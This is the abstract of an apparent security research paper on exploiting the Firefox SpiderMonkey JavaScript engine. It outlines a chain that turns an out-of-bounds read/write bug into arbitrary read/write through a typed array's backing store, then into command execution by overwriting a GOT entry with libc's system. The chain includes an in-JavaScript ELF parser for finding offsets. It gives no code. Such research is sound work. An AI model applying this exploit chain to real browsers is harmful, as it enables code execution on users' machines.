In this
paper, I present a set of techniques that enable command execution within the
Spidermonkey JS Engine given a relative read/write (rw) bug. A relative rw bug
is also known as an out of bounds (OOB) bug. I will discuss how to convert a
relative rw primitive into an arbitrary rw primitive by overwriting the backing
store pointer of a JavaScript typed array. From an arbitrary rw primitive I
gain command execution by overwriting an entry in the Global Offset Table (GOT)
with a pointer to the system libc call. Finally, I demonstrate how to determine
the GOT offsets by implementing an ELF-parser within the JavaScript exploit
code, that parses the in-memory Spidermonkey ELF image.
Firefox Spidermonkey JS Engine Exploitation.PDF